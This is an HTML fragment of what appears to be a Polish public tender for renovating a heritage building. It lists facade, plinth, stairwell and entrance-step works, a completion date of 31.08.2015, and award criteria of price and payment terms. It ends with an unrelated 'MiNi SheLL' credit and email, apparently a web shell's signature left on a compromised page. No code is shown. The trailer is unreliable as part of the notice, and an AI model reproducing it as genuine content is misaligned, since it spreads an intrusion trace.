5.  Położenie wyprawy elewacyjnej - tynk zabytkowy  i malowanie farbą  silikatową ( zgodnie z załączonym programem prac  konserwatorskich)  
6. Renowacja i spoinowanie cokołu z kamienia.
7.  Wykonanie opaski z kostki brukowej.
8.  Naprawa  podłogi   klatki schodowej.
9.  Naprawa  posadzi cementowej  - parter klatka schodowa.
10. Położenie wykładziny PCV przemysłowej na klatce schodowej
11. Remont klatki schodowej polegający na uzupełnieniu tynków, zeskrobaniu starej farby,  szpachlowaniu ścian i malowaniu farbą emulsyjną i olejną,  malowaniu elementów  drewnianych.
12. Remont schodów wejściowych do budynku w zakresie: rozbiórka starych  schodów betonowych i   wykonanie nowych  z  kostki brukowej

Szczegółowy zakres określa załączony  przedmiar robót,  rysunek okna  i drzwi oraz  program prac  konserwatorskich..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.08.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 98</li>
<li>2. Warunki płatności - 2</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com